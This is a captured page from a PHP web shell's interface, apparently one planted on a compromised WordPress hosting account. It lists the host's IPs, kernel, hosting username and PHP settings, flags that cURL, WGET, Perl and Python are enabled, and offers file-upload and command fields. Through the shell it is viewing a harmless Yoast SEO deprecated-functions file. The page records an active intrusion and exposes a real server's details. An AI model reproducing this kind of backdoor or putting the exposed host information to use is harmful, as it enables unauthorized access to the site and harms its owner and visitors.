403Webshell
Server IP : 172.67.158.161  /  Your IP : 3.145.152.51
Web Server : LiteSpeed
System : Linux business53.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : giankuin ( 1871)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/root/proc/self/cwd/wp-content/plugins/wordpress-seo/inc/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/proc/self/cwd/wp-content/plugins/wordpress-seo/inc/wpseo-functions-deprecated.php
<?php
/**
 * WPSEO plugin file.
 *
 * @package WPSEO\Deprecated
 */

/**
 * Adds help tabs.
 *
 * @deprecated 7.6.0
 * @codeCoverageIgnore
 *
 * @param array $tabs Current help center tabs.
 *
 * @return array List containing all the additional tabs.
 */
function yoast_add_meta_options_help_center_tabs( $tabs ) {
	_deprecated_function( __FUNCTION__, 'WPSEO 7.6.0', 'WPSEO_Help_Center_Template_Variables_Tab::add_meta_options_help_center_tabs' );

	return $tabs;
}

/**
 * Adds template variables to the help center.
 *
 * @deprecated 7.6.0
 * @codeCoverageIgnore
 *
 * @return string The content for the template variables tab.
 */
function wpseo_add_template_variables_helpcenter() {
	_deprecated_function( __FUNCTION__, 'WPSEO 7.6.0' );

	return '';
}

Youez - 2016 - github.com/yon3zu
LinuXploit